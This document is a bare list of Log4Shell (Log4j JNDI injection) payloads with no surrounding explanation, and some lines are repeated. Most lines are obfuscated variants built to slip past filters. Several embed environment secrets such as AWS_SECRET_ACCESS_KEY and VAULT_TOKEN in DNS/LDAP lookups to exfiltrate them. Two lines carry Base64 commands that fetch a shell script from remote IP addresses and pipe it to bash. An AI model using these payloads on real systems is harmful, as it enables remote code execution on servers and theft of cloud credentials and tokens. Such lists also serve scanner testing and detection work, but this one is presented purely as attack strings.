${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://hostname}
${${::-j}ndi:rmi://hostname}
${jndi:ldap://hostname}
${jndi:rmi://hostname}
${${lower:jndi}:${lower:rmi}://hostname}
${${lower:${lower:jndi}}:${lower:rmi}://hostname}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://hostname}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://hostname}
${jndi:ldap://hostname/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://hostname}
${${::-j}ndi:rmi://hostname}
${jndi:rmi://hostname}
${${lower:jndi}:${lower:rmi}://hostname}
${${lower:${lower:jndi}}:${lower:rmi}://hostname}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://hostname}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://hostname}
${${upper:jndi}:${upper:rmi}://hostname}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://hostname}
${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://hostname}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostname}.hostname}
${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostname}.hostname}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.hostname}
${jndi:dns://aeutbj.hostname/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://hostname/
${jndi:ldap://hostname/i_rock}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//hostname}
/$%7Bjndi:ldap://hostname/Exploit%7D
/$%7Bjndi:ldap://x-ios-validation.com.hostname%7D
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.hostname}
${jndi:ldap://${env:VAULT_TOKEN}.hostname}
${jndi:rmi://${env:VAULT_TOKEN}.hostname}
${jndi:ldap://${env:AWS_GOVCLOUD_ACCESS_KEY}.hostname}
${jndi:ldap://${sys:java.version}.hostname}
${jndi:ldap://${hostname}.§§.${sys:java.version}.hostname}
${jndi:ldap://${env:JAVA_VERSION}.hostname}
${jndi:ldap://hostname/${java:version}}
/$%7bjndi:ldap:/$%7blower:/%7dhostname/o=tomcat%7d$%7blower:/%7d/
${jndi:ldap://hostname/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}
${jndi:ldap://hostname/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://hostname}
${${::-j}ndi:rmi://hostname}
${jndi:rmi://hostname}
${${lower:jndi}:${lower:rmi}://hostname}
${${lower:${lower:jndi}}:${lower:rmi}://hostname}